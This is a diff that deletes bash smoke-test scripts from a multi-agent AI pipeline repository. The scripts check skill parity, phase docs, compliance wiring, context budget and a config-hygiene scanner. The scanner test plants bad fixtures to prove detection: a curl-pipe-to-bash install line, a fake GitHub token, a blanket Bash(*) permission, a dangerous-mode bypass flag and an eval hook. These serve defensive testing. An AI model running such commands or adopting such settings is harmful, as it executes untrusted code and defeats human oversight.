[ "$MISSING_SKILL" -eq 0 ] && pass "all $N commands have a shared/core skill"
|
|
78
|
-
|
|
79
|
-
echo ""
|
|
80
|
-
echo "══ command-inventory smoke: $PASS passed, $FAIL failed ══"
|
|
81
|
-
[ "$FAIL" -eq 0 ] || exit 1
|
|
@@ -1,87 +0,0 @@
|
|
|
1
|
-
#!/usr/bin/env bash
|
|
2
|
-
# smoke-commands-skills-parity.sh - catch drift between the dual source of
|
|
3
|
-
# truth for pipeline sub-commands.
|
|
4
|
-
#
|
|
5
|
-
# Current state: pipeline/commands/multi-agent/{cmd}.md (Claude slash
|
|
6
|
-
# commands) and pipeline/skills/shared/multi-agent-{cmd}/SKILL.md (Copilot
|
|
7
|
-
# skills) describe the same behaviors in parallel. ROADMAP 4.0 will collapse
|
|
8
|
-
# them to a single source. Until then, any command that exists in one but
|
|
9
|
-
# not the other is a bug - users will see feature mismatch between CLIs.
|
|
10
|
-
#
|
|
11
|
-
# This smoke enforces structural parity (every command has a matching skill).
|
|
12
|
-
# Content drift is a separate problem - sync-parity-check.sh is the manual
|
|
13
|
-
# watchdog for that.
|
|
14
|
-
|
|
15
|
-
set -uo pipefail
|
|
16
|
-
|
|
17
|
-
REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
|
|
18
|
-
CMDS_DIR="$REPO_ROOT/pipeline/commands/multi-agent"
|
|
19
|
-
SKILLS_DIR="$REPO_ROOT/pipeline/skills/shared/core"
|
|
20
|
-
|
|
21
|
-
if [ ! -d "$CMDS_DIR" ]; then
|
|
22
|
-
echo "FAIL: $CMDS_DIR missing" >&2
|
|
23
|
-
exit 1
|
|
24
|
-
fi
|
|
25
|
-
if [ ! -d "$SKILLS_DIR" ]; then
|
|
26
|
-
echo "FAIL: $SKILLS_DIR missing" >&2
|
|
27
|
-
exit 1
|
|
28
|
-
fi
|
|
29
|
-
|
|
30
|
-
PASS=0
|
|
31
|
-
FAIL=0
|
|
32
|
-
pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
|
|
33
|
-
fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
|
|
34
|
-
|
|
35
|
-
# Commands to check - top-level *.md files under commands/multi-agent/.
|
|
36
|
-
# Underscore-prefixed files (e.g. _account-picker.md) are internal fragments
|
|
37
|
-
# loaded by other commands via Read; they're not invocable slash commands and
|
|
38
|
-
# intentionally have no matching skill.
|
|
39
|
-
CMDS=$(find "$CMDS_DIR" -mindepth 2 -maxdepth 2 -name "SKILL.md" -exec sh -c 'for f do basename "$(dirname "$f")"; done' sh {} + | sort)
|
|
40
|
-
|
|
41
|
-
# help.md in commands maps to multi-agent-help skill; the main "multi-agent"
|
|
42
|
-
# skill covers the behavior documented across multiple command files, so we
|
|
43
|
-
# allow the orchestrator skill to stand in.
|
|
44
|
-
ORCHESTRATOR_COVERS=("help" "setup" "status" "log" "resume" "kill" "purge")
|
|
45
|
-
|
|
46
|
-
orchestrator_covers() {
|
|
47
|
-
for name in "${ORCHESTRATOR_COVERS[@]}"; do
|
|
48
|
-
[ "$name" = "$1" ] && return 0
|
|
49
|
-
done
|
|
50
|
-
return 1
|
|
51
|
-
}
|
|
52
|
-
|
|
53
|
-
echo "→ Checking that every command has a corresponding skill"
|
|
54
|
-
for cmd in $CMDS; do
|
|
55
|
-
skill_dir="$SKILLS_DIR/multi-agent-$cmd"
|
|
56
|
-
if [ -d "$skill_dir" ] && [ -f "$skill_dir/SKILL.md" ]; then
|
|
57
|
-
pass "commands/multi-agent/$cmd.md ↔ skills/shared/multi-agent-$cmd/"
|
|
58
|
-
elif orchestrator_covers "$cmd" && [ -f "$SKILLS_DIR/multi-agent/SKILL.md" ]; then
|
|
59
|
-
pass "commands/multi-agent/$cmd.md covered by orchestrator skill (skills/shared/multi-agent/)"
|
|
60
|
-
else
|
|
61
|
-
fail "commands/multi-agent/$cmd.md has no matching skill"
|
|
62
|
-
fi
|
|
63
|
-
done
|
|
64
|
-
|
|
65
|
-
echo ""
|
|
66
|
-
echo "→ Checking that every multi-agent-* skill has a corresponding command"
|
|
67
|
-
SKILLS=$(find "$SKILLS_DIR" -maxdepth 1 -type d -name "multi-agent-*" -exec basename {} \; | sed 's/^multi-agent-//' | sort)
|
|
68
|
-
|
|
69
|
-
for skill in $SKILLS; do
|
|
70
|
-
cmd_file="$CMDS_DIR/$skill/SKILL.md"
|
|
71
|
-
# A few skills are Copilot-CLI-style conveniences without a Claude slash equivalent:
|
|
72
|
-
case "$skill" in
|
|
73
|
-
autopilot | dev-autopilot) # dash-style shortcut skills, the flags are documented in help.md
|
|
74
|
-
pass "skills/shared/multi-agent-$skill/ is a Copilot flag shortcut (documented in help)"
|
|
75
|
-
continue
|
|
76
|
-
;;
|
|
77
|
-
esac
|
|
78
|
-
if [ -f "$cmd_file" ]; then
|
|
79
|
-
pass "skills/shared/multi-agent-$skill/ ↔ commands/multi-agent/$skill/SKILL.md"
|
|
80
|
-
else
|
|
81
|
-
fail "skills/shared/multi-agent-$skill/ has no matching command"
|
|
82
|
-
fi
|
|
83
|
-
done
|
|
84
|
-
|
|
85
|
-
echo ""
|
|
86
|
-
echo "══ commands-skills-parity smoke: $PASS passed, $FAIL failed ══"
|
|
87
|
-
[ "$FAIL" -eq 0 ] || exit 1
|
|
@@ -1,75 +0,0 @@
|
|
|
1
|
-
#!/usr/bin/env bash
|
|
2
|
-
# smoke-community-gates.sh - v9.11.0
|
|
3
|
-
#
|
|
4
|
-
# Validates that the three community-sourced quality steps are wired into
|
|
5
|
-
# their phase docs:
|
|
6
|
-
# B1 code-simplifier pass -> phase-3-dev.md (diff shrink before Phase 4)
|
|
7
|
-
# B2 lesson memory loop -> phase-4-review.md (root-cause lesson per fix round)
|
|
8
|
-
# B3 cross-artifact check -> phase-2-planning.md (plan vs analysis, pre-approval)
|
|
9
|
-
#
|
|
10
|
-
# Without this, the steps can silently drop out of the phase docs during a
|
|
11
|
-
# refactor and the pipeline regresses to bloated diffs, repeated root causes,
|
|
12
|
-
# and plans that drift from the analysis.
|
|
13
|
-
#
|
|
14
|
-
# What this does NOT enforce:
|
|
15
|
-
# - Runtime - that the agent actually runs the steps. This smoke catches
|
|
16
|
-
# the prompt-side gap, same as smoke-tracker-contract.sh.
|
|
17
|
-
|
|
18
|
-
set -euo pipefail
|
|
19
|
-
|
|
20
|
-
REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
|
|
21
|
-
PHASES_DIR="$REPO_ROOT/pipeline/multi-agent-refs/phases"
|
|
22
|
-
|
|
23
|
-
PASS=0
|
|
24
|
-
FAIL=0
|
|
25
|
-
pass() { PASS=$((PASS + 1)); echo " ✓ $1"; }
|
|
26
|
-
fail() { FAIL=$((FAIL + 1)); echo " ✗ $1"; }
|
|
27
|
-
|
|
28
|
-
check() {
|
|
29
|
-
local doc="$1" marker="$2" label="$3"
|
|
30
|
-
local full="$PHASES_DIR/$doc"
|
|
31
|
-
if [ ! -f "$full" ]; then
|
|
32
|
-
fail "$doc missing"
|
|
33
|
-
return
|
|
34
|
-
fi
|
|
35
|
-
if grep -qiF "$marker" "$full"; then
|
|
36
|
-
pass "$doc: $label"
|
|
37
|
-
else
|
|
38
|
-
fail "$doc missing $label (marker: $marker)"
|
|
39
|
-
fi
|
|
40
|
-
}
|
|
41
|
-
|
|
42
|
-
# ──────────────────────────────────────────────────────────────────────────
|
|
43
|
-
echo "→ 1. B1 - code-simplifier pass in phase-3-dev.md"
|
|
44
|
-
check "phase-3-dev.md" "Code-simplifier pass" "diff-shrink step heading"
|
|
45
|
-
check "phase-3-dev.md" "Comment bloat" "comment-bloat smell"
|
|
46
|
-
check "phase-3-dev.md" "Unrelated rewrites" "unrelated-rewrites smell"
|
|
47
|
-
check "phase-3-dev.md" "Dead code" "dead-code smell"
|
|
48
|
-
check "phase-3-dev.md" "Over-abstraction" "over-abstraction smell"
|
|
49
|
-
check "phase-3-dev.md" "Re-run build + tests" "post-shrink build/test re-run"
|
|
50
|
-
check "phase-3-dev.md" "dev.simplifier_pass" "cost-ledger metric for the subagent"
|
|
51
|
-
check "phase-3-dev.md" "dispatching code-simplifier diff-shrink" "progress line"
|
|
52
|
-
|
|
53
|
-
# ──────────────────────────────────────────────────────────────────────────
|
|
54
|
-
echo ""
|
|
55
|
-
echo "→ 2. B2 - lesson memory loop in phase-4-review.md"
|
|
56
|
-
check "phase-4-review.md" "Lesson memory loop" "lesson step heading"
|
|
57
|
-
check "phase-4-review.md" "learnings-ledger.mjs add" "ledger append invocation (existing store, no parallel store)"
|
|
58
|
-
check "phase-4-review.md" "one-line root-cause lesson" "one-line root-cause contract"
|
|
59
|
-
check "phase-4-review.md" "writing lesson to learnings ledger" "progress line"
|
|
60
|
-
|
|
61
|
-
# ──────────────────────────────────────────────────────────────────────────
|
|
62
|
-
echo ""
|
|
63
|
-
echo "→ 3. B3 - cross-artifact consistency check in phase-2-planning.md"
|
|
64
|
-
check "phase-2-planning.md" "Cross-artifact consistency check" "consistency step heading"
|
|
65
|
-
check "phase-2-planning.md" "maps to at least one plan task" "requirement-coverage check"
|
|
66
|
-
check "phase-2-planning.md" "No plan task without an analysis anchor" "anchor-integrity check"
|
|
67
|
-
check "phase-2-planning.md" "Open-question carry-over" "open-question carry-over check"
|
|
68
|
-
check "phase-2-planning.md" "revise the plan ONCE" "single-revision rule"
|
|
69
|
-
check "phase-2-planning.md" "Consistency gaps" "remaining-gaps surfacing banner"
|
|
70
|
-
check "phase-2-planning.md" "checking plan-vs-analysis consistency" "progress line"
|
|
71
|
-
|
|
72
|
-
# ──────────────────────────────────────────────────────────────────────────
|
|
73
|
-
echo ""
|
|
74
|
-
echo "══ community-gates smoke: $PASS passed, $FAIL failed ══"
|
|
75
|
-
[ "$FAIL" -eq 0 ]
|
|
@@ -1,119 +0,0 @@
|
|
|
1
|
-
#!/usr/bin/env bash
|
|
2
|
-
# smoke-compliance-skills.sh - v5.8.0+ store-ready compliance skills contract.
|
|
3
|
-
#
|
|
4
|
-
# Verifies the two compliance skills are consistent with their documentation and
|
|
5
|
-
# that the 4 claimed consumer surfaces actually reference them (not just promise).
|
|
6
|
-
#
|
|
7
|
-
# Covers:
|
|
8
|
-
# 1. apple-archive-compliance/SKILL.md exists, has frontmatter, 18-rule catalog,
|
|
9
|
-
# EN + TR humanizer blocks, severity table, prerequisite detection.
|
|
10
|
-
# 2. google-play-compliance/SKILL.md exists, has frontmatter, 21-rule catalog
|
|
11
|
-
# across 4 categories, EN + TR humanizer blocks, severity table, prereq detection.
|
|
12
|
-
# 3. sim-test.md has "store-ready" scenario branch with platform detection.
|
|
13
|
-
# 4. security-auditor.md cites both skills in a cross-reference subsection.
|
|
14
|
-
# 5. review.md + multi-agent-review/SKILL.md cite both skills.
|
|
15
|
-
# 6. channels.md + multi-agent-channels/SKILL.md have auto-augmentation logic
|
|
16
|
-
# that reads cached JSON reports.
|
|
17
|
-
|
|
18
|
-
set -euo pipefail
|
|
19
|
-
|
|
20
|
-
HERE="$(cd "$(dirname "$0")" && pwd)"
|
|
21
|
-
ROOT="$(cd "$HERE/../.." && pwd)"
|
|
22
|
-
|
|
23
|
-
APPLE_SKILL="$ROOT/pipeline/skills/shared/core/apple-archive-compliance/SKILL.md"
|
|
24
|
-
GOOGLE_SKILL="$ROOT/pipeline/skills/shared/core/google-play-compliance/SKILL.md"
|
|
25
|
-
SIM_TEST="$ROOT/pipeline/commands/sim-test.md"
|
|
26
|
-
SEC_AUDITOR="$ROOT/pipeline/agents/security-auditor.md"
|
|
27
|
-
REVIEW_CMD="$ROOT/pipeline/commands/multi-agent/review/SKILL.md"
|
|
28
|
-
REVIEW_SKILL="$ROOT/pipeline/skills/shared/core/multi-agent-review/SKILL.md"
|
|
29
|
-
CHANNELS_CMD="$ROOT/pipeline/commands/multi-agent/channels/SKILL.md"
|
|
30
|
-
CHANNELS_SKILL="$ROOT/pipeline/skills/shared/core/multi-agent-channels/SKILL.md"
|
|
31
|
-
|
|
32
|
-
PASS=0
|
|
33
|
-
FAIL=0
|
|
34
|
-
pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
|
|
35
|
-
fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
|
|
36
|
-
|
|
37
|
-
for f in "$APPLE_SKILL" "$GOOGLE_SKILL" "$SIM_TEST" "$SEC_AUDITOR" "$REVIEW_CMD" "$REVIEW_SKILL" "$CHANNELS_CMD" "$CHANNELS_SKILL"; do
|
|
38
|
-
[ -f "$f" ] || { echo "error: missing $f" >&2; exit 1; }
|
|
39
|
-
done
|
|
40
|
-
|
|
41
|
-
echo "→ 1. apple-archive-compliance SKILL.md frontmatter + catalog shape"
|
|
42
|
-
grep -q "^name: apple-archive-compliance$" "$APPLE_SKILL" && pass "apple frontmatter name" || fail "apple frontmatter name"
|
|
43
|
-
grep -q "^user-invocable: true$" "$APPLE_SKILL" && pass "apple user-invocable" || fail "apple user-invocable"
|
|
44
|
-
grep -q "argument-hint:" "$APPLE_SKILL" && pass "apple argument-hint" || fail "apple argument-hint"
|
|
45
|
-
# Count rule rows in the catalog table (excluding header + separator)
|
|
46
|
-
APPLE_RULES=$(awk '/^## 18-Rule Catalog/,/^## Severity mapping/' "$APPLE_SKILL" | grep -cE '^\| *[0-9]+ *\|' || true)
|
|
47
|
-
[ "$APPLE_RULES" -eq 18 ] && pass "apple catalog has 18 rule rows" || fail "apple catalog has $APPLE_RULES rule rows (want 18)"
|
|
48
|
-
|
|
49
|
-
echo "→ 2. apple skill humanizer blocks EN + TR + severity table"
|
|
50
|
-
# v8.2 split humanizer language from picker language: gating moved from
|
|
51
|
-
# `promptLanguage == "en"|"tr"` (locked to "en") to the per-run `--lang=` flag.
|
|
52
|
-
grep -qE '^### EN .*--lang=en' "$APPLE_SKILL" && pass "apple EN humanizer block present" || fail "apple EN humanizer missing"
|
|
53
|
-
grep -qE '^### TR .*--lang=tr' "$APPLE_SKILL" && pass "apple TR humanizer block present" || fail "apple TR humanizer missing"
|
|
54
|
-
grep -qE '\| *`error` *\|' "$APPLE_SKILL" && pass "apple severity table has error row" || fail "apple severity error row"
|
|
55
|
-
grep -qE '\| *`warning` *\|' "$APPLE_SKILL" && pass "apple severity table has warning row" || fail "apple severity warning row"
|
|
56
|
-
grep -qE '\| *`info` *\|' "$APPLE_SKILL" && pass "apple severity table has info row" || fail "apple severity info row"
|
|
57
|
-
|
|
58
|
-
echo "→ 3. apple skill prerequisite detection + archive resolution (v8.4.0+ uses dev-toolkit-mcp)"
|
|
59
|
-
grep -q 'ios_app_store_audit' "$APPLE_SKILL" && pass "apple references ios_app_store_audit MCP tool" || fail "apple ios_app_store_audit reference missing"
|
|
60
|
-
grep -q '.xcarchive' "$APPLE_SKILL" && pass "apple references .xcarchive" || fail "apple .xcarchive missing"
|
|
61
|
-
grep -q '@mmerterden/dev-toolkit-mcp' "$APPLE_SKILL" && pass "apple references @mmerterden/dev-toolkit-mcp package" || fail "apple dev-toolkit-mcp reference missing"
|
|
62
|
-
grep -q 'mcp__dev-toolkit__ios_app_store_audit' "$APPLE_SKILL" && pass "apple shows MCP-call invocation form" || fail "apple MCP-call invocation form missing"
|
|
63
|
-
|
|
64
|
-
echo "→ 4. google-play-compliance SKILL.md frontmatter + catalog shape"
|
|
65
|
-
grep -q "^name: google-play-compliance$" "$GOOGLE_SKILL" && pass "google frontmatter name" || fail "google frontmatter name"
|
|
66
|
-
grep -q "^user-invocable: true$" "$GOOGLE_SKILL" && pass "google user-invocable" || fail "google user-invocable"
|
|
67
|
-
grep -q "argument-hint:" "$GOOGLE_SKILL" && pass "google argument-hint" || fail "google argument-hint"
|
|
68
|
-
GOOGLE_RULES=$(awk '/^## 21-Rule Policy Catalog/,/^## Severity mapping/' "$GOOGLE_SKILL" | grep -cE '^\| *[0-9]+ *\|' || true)
|
|
69
|
-
[ "$GOOGLE_RULES" -eq 21 ] && pass "google catalog has 21 rule rows" || fail "google catalog has $GOOGLE_RULES rule rows (want 21)"
|
|
70
|
-
|
|
71
|
-
echo "→ 5. google catalog has 4 categories (A Technical / B Security / C Privacy / D Hygiene)"
|
|
72
|
-
grep -q "^### A\. Technical requirements" "$GOOGLE_SKILL" && pass "google A Technical category" || fail "google A Technical missing"
|
|
73
|
-
grep -q "^### B\. Security" "$GOOGLE_SKILL" && pass "google B Security category" || fail "google B Security missing"
|
|
74
|
-
grep -q "^### C\. Privacy" "$GOOGLE_SKILL" && pass "google C Privacy category" || fail "google C Privacy missing"
|
|
75
|
-
grep -q "^### D\. Release hygiene" "$GOOGLE_SKILL" && pass "google D Hygiene category" || fail "google D Hygiene missing"
|
|
76
|
-
|
|
77
|
-
echo "→ 6. google skill humanizer blocks EN + TR"
|
|
78
|
-
grep -qE '^### EN .*--lang=en' "$GOOGLE_SKILL" && pass "google EN humanizer block present" || fail "google EN humanizer missing"
|
|
79
|
-
grep -qE '^### TR .*--lang=tr' "$GOOGLE_SKILL" && pass "google TR humanizer block present" || fail "google TR humanizer missing"
|
|
80
|
-
|
|
81
|
-
echo "→ 7. google skill tool orchestration"
|
|
82
|
-
grep -q 'bundletool' "$GOOGLE_SKILL" && pass "google references bundletool" || fail "google bundletool missing"
|
|
83
|
-
grep -q 'aapt2' "$GOOGLE_SKILL" && pass "google references aapt2" || fail "google aapt2 missing"
|
|
84
|
-
grep -q 'apksigner' "$GOOGLE_SKILL" && pass "google references apksigner" || fail "google apksigner missing"
|
|
85
|
-
grep -q '.aab' "$GOOGLE_SKILL" && pass "google references .aab" || fail "google .aab missing"
|
|
86
|
-
|
|
87
|
-
echo "→ 8. sim-test.md store-ready scenario branch"
|
|
88
|
-
grep -q 'store-ready' "$SIM_TEST" && pass "sim-test mentions store-ready" || fail "sim-test missing store-ready"
|
|
89
|
-
grep -q 'apple-archive-compliance' "$SIM_TEST" && pass "sim-test dispatches apple skill" || fail "sim-test missing apple dispatch"
|
|
90
|
-
grep -q 'google-play-compliance' "$SIM_TEST" && pass "sim-test dispatches google skill" || fail "sim-test missing google dispatch"
|
|
91
|
-
grep -q '\.xcodeproj' "$SIM_TEST" && pass "sim-test platform-detects .xcodeproj" || fail "sim-test missing .xcodeproj detect"
|
|
92
|
-
grep -q 'build\.gradle' "$SIM_TEST" && pass "sim-test platform-detects build.gradle" || fail "sim-test missing build.gradle detect"
|
|
93
|
-
|
|
94
|
-
echo "→ 9. consumer wiring - security-auditor (both catalogs)"
|
|
95
|
-
grep -q 'apple-archive-compliance' "$SEC_AUDITOR" && pass "security-auditor references apple skill" || fail "security-auditor apple reference missing"
|
|
96
|
-
grep -q 'google-play-compliance' "$SEC_AUDITOR" && pass "security-auditor references google skill" || fail "security-auditor google reference missing"
|
|
97
|
-
grep -qE 'Info\.plist|PrivacyInfo|entitlements' "$SEC_AUDITOR" && pass "security-auditor lists iOS trigger files" || fail "security-auditor iOS trigger files missing"
|
|
98
|
-
grep -qE 'AndroidManifest|build\.gradle|proguard' "$SEC_AUDITOR" && pass "security-auditor lists Android trigger files" || fail "security-auditor Android trigger files missing"
|
|
99
|
-
|
|
100
|
-
echo "→ 10. consumer wiring - /multi-agent:review (both CLIs)"
|
|
101
|
-
grep -q 'apple-archive-compliance' "$REVIEW_CMD" && pass "review.md cites apple catalog" || fail "review.md apple reference missing"
|
|
102
|
-
grep -q 'google-play-compliance' "$REVIEW_CMD" && pass "review.md cites google catalog" || fail "review.md google reference missing"
|
|
103
|
-
grep -q 'apple-archive-compliance' "$REVIEW_SKILL" && pass "review SKILL.md cites apple catalog" || fail "review SKILL.md apple missing"
|
|
104
|
-
grep -q 'google-play-compliance' "$REVIEW_SKILL" && pass "review SKILL.md cites google catalog" || fail "review SKILL.md google missing"
|
|
105
|
-
|
|
106
|
-
echo "→ 11. consumer wiring - /multi-agent:channels auto-augmentation"
|
|
107
|
-
grep -q 'archiveguard-.*\.json' "$CHANNELS_CMD" && pass "channels.md reads cached archiveguard JSON" || fail "channels.md archiveguard cache missing"
|
|
108
|
-
grep -q 'play-compliance-.*\.json' "$CHANNELS_CMD" && pass "channels.md reads cached play-compliance JSON" || fail "channels.md play-compliance cache missing"
|
|
109
|
-
grep -qE 'Store compliance|store compliance' "$CHANNELS_CMD" && pass "channels.md has Store compliance section" || fail "channels.md Store compliance section missing"
|
|
110
|
-
grep -q 'archiveguard-.*\.json' "$CHANNELS_SKILL" && pass "channels SKILL.md reads archiveguard cache" || fail "channels SKILL.md archiveguard cache missing"
|
|
111
|
-
grep -q 'play-compliance-.*\.json' "$CHANNELS_SKILL" && pass "channels SKILL.md reads play-compliance cache" || fail "channels SKILL.md play-compliance cache missing"
|
|
112
|
-
grep -qE 'Store compliance|store compliance' "$CHANNELS_SKILL" && pass "channels SKILL.md has Store compliance section" || fail "channels SKILL.md Store compliance section missing"
|
|
113
|
-
|
|
114
|
-
echo "→ 12. apple skill writes the cache filename channels.md reads (producer↔consumer agreement)"
|
|
115
|
-
grep -q 'archiveguard-\$\$\.json\|archiveguard-{pid}\.json' "$APPLE_SKILL" && pass "apple skill writes /tmp/archiveguard-*.json (matches channels glob)" || fail "apple skill cache filename does NOT match channels glob - store-compliance auto-augmentation will silently never trigger"
|
|
116
|
-
|
|
117
|
-
echo ""
|
|
118
|
-
echo "══ compliance-skills smoke: $PASS passed, $FAIL failed ══"
|
|
119
|
-
[ "$FAIL" -eq 0 ]
|
|
@@ -1,58 +0,0 @@
|
|
|
1
|
-
#!/usr/bin/env bash
|
|
2
|
-
# smoke-config-hygiene.sh - contract for scan-agent-config.sh.
|
|
3
|
-
#
|
|
4
|
-
# 1. The real shipped surface must be clean (exit 0).
|
|
5
|
-
# 2. A fixture tree with planted-bad configs must be caught (exit 1, HIGH findings).
|
|
6
|
-
# Detection matters: a hygiene gate that never fires is worthless.
|
|
7
|
-
#
|
|
8
|
-
# Exit 0 = all pass, 1 = any failure.
|
|
9
|
-
|
|
10
|
-
set -uo pipefail
|
|
11
|
-
|
|
12
|
-
ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
|
|
13
|
-
SCANNER="$ROOT/pipeline/scripts/scan-agent-config.sh"
|
|
14
|
-
[ -f "$SCANNER" ] || { echo "FAIL: scanner missing" >&2; exit 1; }
|
|
15
|
-
|
|
16
|
-
PASS=0; FAIL=0
|
|
17
|
-
pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
|
|
18
|
-
fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
|
|
19
|
-
|
|
20
|
-
echo "→ 1. real shipped surface is clean"
|
|
21
|
-
if bash "$SCANNER" >/dev/null 2>&1; then pass "real surface exits 0"; else fail "real surface flagged (unexpected)"; fi
|
|
22
|
-
|
|
23
|
-
echo "→ 2. planted-bad fixture is caught"
|
|
24
|
-
TMP="$(mktemp -d)"; trap 'rm -rf "$TMP"' EXIT
|
|
25
|
-
mkdir -p "$TMP/install/templates" "$TMP/pipeline/agents" "$TMP/pipeline/scripts"
|
|
26
|
-
|
|
27
|
-
# a fake (non-real) token that matches the high-signal prefix rule
|
|
28
|
-
FAKE_TOKEN="ghp_$(printf 'A%.0s' $(seq 1 36))"
|
|
29
|
-
cat > "$TMP/pipeline/preferences-template.json" <<EOF
|
|
30
|
-
{ "token": "$FAKE_TOKEN", "install": "curl https://x.example/i.sh | bash" }
|
|
31
|
-
EOF
|
|
32
|
-
|
|
33
|
-
# bad hooks template: blanket Bash(*), bypass flag, and an eval-bearing hook cmd
|
|
34
|
-
cat > "$TMP/install/templates/claude-hooks.json" <<'EOF'
|
|
35
|
-
{
|
|
36
|
-
"permissions": { "allow": ["Bash(*)"] },
|
|
37
|
-
"skipDangerousModePermissionPrompt": true,
|
|
38
|
-
"hooks": { "PreToolUse": [ { "matcher": "Bash(git commit:*)",
|
|
39
|
-
"hooks": [ { "type": "command", "command": "bash -c \"eval $(cat x)\"" } ] } ] }
|
|
40
|
-
}
|
|
41
|
-
EOF
|
|
42
|
-
: > "$TMP/pipeline/agents/placeholder.md"
|
|
43
|
-
|
|
44
|
-
OUT="$(SCAN_ROOT="$TMP" bash "$SCANNER" 2>&1 || true)"
|
|
45
|
-
CODE=$?
|
|
46
|
-
# under set -e off, capture exit explicitly
|
|
47
|
-
SCAN_ROOT="$TMP" bash "$SCANNER" >/dev/null 2>&1; CODE=$?
|
|
48
|
-
|
|
49
|
-
[ "$CODE" -eq 1 ] && pass "fixture exits 1 (blocking)" || fail "fixture did not block (exit $CODE)"
|
|
50
|
-
echo "$OUT" | grep -q "\[HIGH\].*secret" && pass "detects hardcoded secret" || fail "missed secret"
|
|
51
|
-
echo "$OUT" | grep -q "\[HIGH\].*bypass" && pass "detects permission bypass" || fail "missed bypass flag"
|
|
52
|
-
echo "$OUT" | grep -q "\[HIGH\].*hook" && pass "detects eval-bearing hook cmd" || fail "missed bad hook command"
|
|
53
|
-
echo "$OUT" | grep -q "\[MEDIUM\].*Bash" && pass "detects blanket Bash(*)" || fail "missed blanket Bash"
|
|
54
|
-
echo "$OUT" | grep -q "\[MEDIUM\].*curl|bash\|pipe-to-shell" && pass "detects curl|bash" || fail "missed curl|bash"
|
|
55
|
-
|
|
56
|
-
echo ""
|
|
57
|
-
echo "══ config-hygiene smoke: $PASS passed, $FAIL failed ══"
|
|
58
|
-
[ "$FAIL" -eq 0 ]
|
|
@@ -1,72 +0,0 @@
|
|
|
1
|
-
#!/usr/bin/env bash
|
|
2
|
-
#
|
|
3
|
-
# smoke-context-budget.sh - the bytes every pipeline run pays before it starts.
|
|
4
|
-
#
|
|
5
|
-
# core/multi-agent/SKILL.md plus multi-agent-refs/rules.md load on every run of
|
|
6
|
-
# every mode, whatever the task. They were 67150 bytes together, roughly 17k
|
|
7
|
-
# tokens spent before the first phase, because the orchestrator skill had grown
|
|
8
|
-
# its own inline copies of things that already existed as loadable references -
|
|
9
|
-
# the log-file template (whose copy had gone stale and named a path the code no
|
|
10
|
-
# longer uses), the help text the multi-agent-help skill owns, and a component
|
|
11
|
-
# generation guide that only applies to design tasks.
|
|
12
|
-
#
|
|
13
|
-
# A budget nobody measures only moves one way, so this pins it. The ceiling is
|
|
14
|
-
# the measured value plus a small margin: enough to add a paragraph, not enough
|
|
15
|
-
# to move a chapter back in. Lowering it is always fine.
|
|
16
|
-
#
|
|
17
|
-
# Exit codes: 0=within budget, 1=over, 2=a tracked file is missing
|
|
18
|
-
|
|
19
|
-
set -euo pipefail
|
|
20
|
-
|
|
21
|
-
REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
|
|
22
|
-
|
|
23
|
-
# The files loaded unconditionally at run start.
|
|
24
|
-
TRACKED="
|
|
25
|
-
pipeline/skills/shared/core/multi-agent/SKILL.md
|
|
26
|
-
pipeline/multi-agent-refs/rules.md
|
|
27
|
-
"
|
|
28
|
-
|
|
29
|
-
# Measured 57289 after the split. 60000 leaves ~2.7 kB of headroom.
|
|
30
|
-
CEILING=${CONTEXT_BUDGET_CEILING:-60000}
|
|
31
|
-
|
|
32
|
-
PASS=0
|
|
33
|
-
FAIL=0
|
|
34
|
-
pass() { PASS=$((PASS + 1)); echo " ✓ $1"; }
|
|
35
|
-
fail() { FAIL=$((FAIL + 1)); echo " ✗ $1"; }
|
|
36
|
-
|
|
37
|
-
echo "→ 1. every tracked file exists"
|
|
38
|
-
TOTAL=0
|
|
39
|
-
for rel in $TRACKED; do
|
|
40
|
-
f="$REPO_ROOT/$rel"
|
|
41
|
-
if [ ! -f "$f" ]; then
|
|
42
|
-
echo " ✗ missing: $rel"
|
|
43
|
-
echo " a tracked file that vanished makes the budget meaningless"
|
|
44
|
-
exit 2
|
|
45
|
-
fi
|
|
46
|
-
n=$(wc -c < "$f" | tr -d ' ')
|
|
47
|
-
TOTAL=$((TOTAL + n))
|
|
48
|
-
pass "$rel ($n bytes)"
|
|
49
|
-
done
|
|
50
|
-
|
|
51
|
-
echo "→ 2. fixed per-run load is within budget"
|
|
52
|
-
if [ "$TOTAL" -le "$CEILING" ]; then
|
|
53
|
-
pass "fixed load $TOTAL bytes, ceiling $CEILING"
|
|
54
|
-
else
|
|
55
|
-
fail "fixed load $TOTAL bytes exceeds the $CEILING ceiling by $((TOTAL - CEILING))"
|
|
56
|
-
echo " Move detail into multi-agent-refs/ and point at it, rather than"
|
|
57
|
-
echo " raising the ceiling. Every byte here is paid by every run."
|
|
58
|
-
fi
|
|
59
|
-
|
|
60
|
-
echo "→ 3. the orchestrator points at the references instead of copying them"
|
|
61
|
-
SKILL="$REPO_ROOT/pipeline/skills/shared/core/multi-agent/SKILL.md"
|
|
62
|
-
REFS=$(grep -c "multi-agent-refs" "$SKILL" || true)
|
|
63
|
-
if [ "$REFS" -ge 3 ]; then
|
|
64
|
-
pass "orchestrator cites multi-agent-refs $REFS times"
|
|
65
|
-
else
|
|
66
|
-
fail "orchestrator cites multi-agent-refs only $REFS time(s)"
|
|
67
|
-
echo " It carried zero citations while duplicating three of those files."
|
|
68
|
-
fi
|
|
69
|
-
|
|
70
|
-
echo ""
|
|
71
|
-
echo "══ smoke-context-budget: $PASS passed, $FAIL failed ══"
|
|
72
|
-
[ "$FAIL" -gt 0 ] && exit 1 || exit 0
|